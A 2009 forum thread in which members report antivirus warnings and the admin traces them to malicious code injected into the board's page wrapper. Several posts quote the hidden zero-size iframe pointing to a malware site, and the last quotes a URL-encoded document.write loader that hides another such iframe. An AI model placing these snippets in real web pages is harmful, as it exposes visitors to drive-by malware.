Lister 0 Posted February 9, 2009 Share Posted February 9, 2009 Im having no problems like. Use Firefox/Vista/AVG Link to comment Share on other sites More sharing options...
Craig 6682 Posted February 9, 2009 Share Posted February 9, 2009 Yep - I've seen the thread over at N-O too.... Not experienced it myself but there's enough of you reporting stuff to know it's not isolated. My initial instincts are that it's something to do with the server - going to need to run this one past Pud I'm afraid... Reaction time 48hrs. Wrong Link to comment Share on other sites More sharing options...
Craig 6682 Posted February 9, 2009 Share Posted February 9, 2009 yeah i'm right you've an iframe loading on pages <iframe src="http://evesteam.net/dl/un/index.php" frameborder=0 width=0 height=0></iframe> just need to upgrade your Invision board or apply the patch i guess there was one released about 6-7months ago for 2.3.5 and under and code for loading the iframe is probably held in the script/page containing the footer info for the copyright and all that shite Thanks for that one Ant. I'm having to wrack my brains but I do seem to recall we had something similar in the early days on this board. What I had to do back then was download the entire code, run a grep to find the weblinks (i.e. evestream.net) and remove it. Upload the modded files and hey presto, all OK. I suspect this is tied in with the spam we've been getting and no doubt what has happened is that someone has clicked one of the links which has set the worm off. Cunts aren't they? Link to comment Share on other sites More sharing options...
andy_w_1986 0 Posted February 9, 2009 Share Posted February 9, 2009 does it for me, on chrome it advises me not to continue and on IE the AVG thing keeps popping up. Im using a PC/Vista/Chrome and IE/AVG Link to comment Share on other sites More sharing options...
Craig 6682 Posted February 9, 2009 Share Posted February 9, 2009 Thanks to Ant, I've found the spurious web link and removed it. Parky (et al) can you please test and advise? Link to comment Share on other sites More sharing options...
Park Life 71 Posted February 9, 2009 Author Share Posted February 9, 2009 Thanks to Ant, I've found the spurious web link and removed it. Parky (et al) can you please test and advise? Safari back to normal. Will let you know pc/vista/avg a bit later. Thank you. Link to comment Share on other sites More sharing options...
Sonatine 11361 Posted February 10, 2009 Share Posted February 10, 2009 No problems here now Link to comment Share on other sites More sharing options...
Park Life 71 Posted February 10, 2009 Author Share Posted February 10, 2009 No problems here now Link to comment Share on other sites More sharing options...
maggiespaws 0 Posted February 10, 2009 Share Posted February 10, 2009 Might be worth doing the upgrade anyway - just to be safe. Sounds like we were lucky this time I know I'm volunteering Craig / Peter / someone for some work - but I dont mind helping out myself if needed. We could suspend posting for an hour or two whilst the upgrade happens? Link to comment Share on other sites More sharing options...
MrBass 2651 Posted February 10, 2009 Share Posted February 10, 2009 It's back... <iframe src="http://evesteam.net/dl/un/index.php" frameborder=0 width=0 height=0></iframe> Link to comment Share on other sites More sharing options...
maggiespaws 0 Posted February 10, 2009 Share Posted February 10, 2009 doubt it would even take an hour or two, upgrades on these sorts of forums tend to be fairly quick and painless changes aren't normally in the files where your settings are stored, or they get merged in with a script etc, and going from 2.3.1> .6 at a guess i'd say would be changing a lot of files you don't tend to go anywhere near at worst prob just a matter of suspending for 20mins and uploading maybe a mb of files over the older ones.. minus your style/theme settings if you even have to worry about that. whether pp etc need a new/renewed license for the new version i don't know and they can be pricey pending on which is required I'm sure that's how long it would take. I was suggesting an hour to allow for the inevitable fuck up. Also, it would allow time to export content, import on a local machine (after screening the sql dump for the injected code) to a clean version of the board software, test it's worked and then replace the version on the live domain. That way, the compromised version is removed completely. Link to comment Share on other sites More sharing options...
LeazesMag 0 Posted February 10, 2009 Share Posted February 10, 2009 It's back... <iframe src="http://evesteam.net/dl/un/index.php" frameborder=0 width=0 height=0></iframe> yep I'm getting the same thing I got yesterday and sunday Link to comment Share on other sites More sharing options...
Park Life 71 Posted February 10, 2009 Author Share Posted February 10, 2009 Unplug it Craig, then kick it and light a joshstick. Always works. Link to comment Share on other sites More sharing options...
Craig 6682 Posted February 10, 2009 Share Posted February 10, 2009 Fingers crossed it's gone again... and even bigger fingers crossed, it won't be coming back. If it does this time, I seriously haven't got a clue. Link to comment Share on other sites More sharing options...
Fop 1 Posted February 11, 2009 Share Posted February 11, 2009 Perfect B-movie monster script this thread. Link to comment Share on other sites More sharing options...
Sonatine 11361 Posted February 12, 2009 Share Posted February 12, 2009 It's back again for me Link to comment Share on other sites More sharing options...
Monkeys Fist 42378 Posted February 12, 2009 Share Posted February 12, 2009 Aye me too. Pain in the ring Link to comment Share on other sites More sharing options...
LeazesMag 0 Posted February 12, 2009 Share Posted February 12, 2009 Aye me too.Pain in the ring same here Link to comment Share on other sites More sharing options...
Gemmill 44804 Posted February 12, 2009 Share Posted February 12, 2009 Aye this is not good. Link to comment Share on other sites More sharing options...
ewerk 30544 Posted February 12, 2009 Share Posted February 12, 2009 Is there any reason I'm not getting this? I'm using Opera and AVG, worried that I'm not getting full protection from AVG if it's not picking this up. Link to comment Share on other sites More sharing options...
Craig 6682 Posted February 12, 2009 Share Posted February 12, 2009 Yep - I've eradicated the problem, that's why No-one's getting it now. Link to comment Share on other sites More sharing options...
andy_w_1986 0 Posted February 13, 2009 Share Posted February 13, 2009 Yep - I've eradicated the problem, that's why No-one's getting it now. Hate to be a kill joy but i still am unfortunately. Its not the end of the world for me, im naive to it all i just tend to click ignore but thought id let you know the problem is still around. Link to comment Share on other sites More sharing options...
MrBass 2651 Posted February 13, 2009 Share Posted February 13, 2009 Yep - I've eradicated the problem, that's why No-one's getting it now. I beg do differ I'm afraid, although I haven't cleared out my cache yet. That said, I wasn't getting it yesterday and am today so fairly certain no amount cache clearing will make any difference. Link to comment Share on other sites More sharing options...
Dr Kenneth Noisewater 0 Posted February 13, 2009 Share Posted February 13, 2009 I've not experienced it at home (firefox3/xp/avg) but today on this pc (firefox2/xp/mcafee) everytime I open a new page it is jumping straight to the bottom of the page. Link to comment Share on other sites More sharing options...
Craig 6682 Posted February 13, 2009 Share Posted February 13, 2009 Hmmmm - i found this imbedded in the board header/footer wrapper..... <script type="text/javascript"> document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%61%66%6D%2E%63%6E%2F%64%6C%6C%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E')); </script> I haven't got a scooby and what concerns me more is I've locked down those files for edit so I can't understand how they've been changed. I've deleted this shit so hopefully it'll be behaving once more for you guys. BTW - if anyone has an ideas as to what the fuck that code is all about, I'd be grateful. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now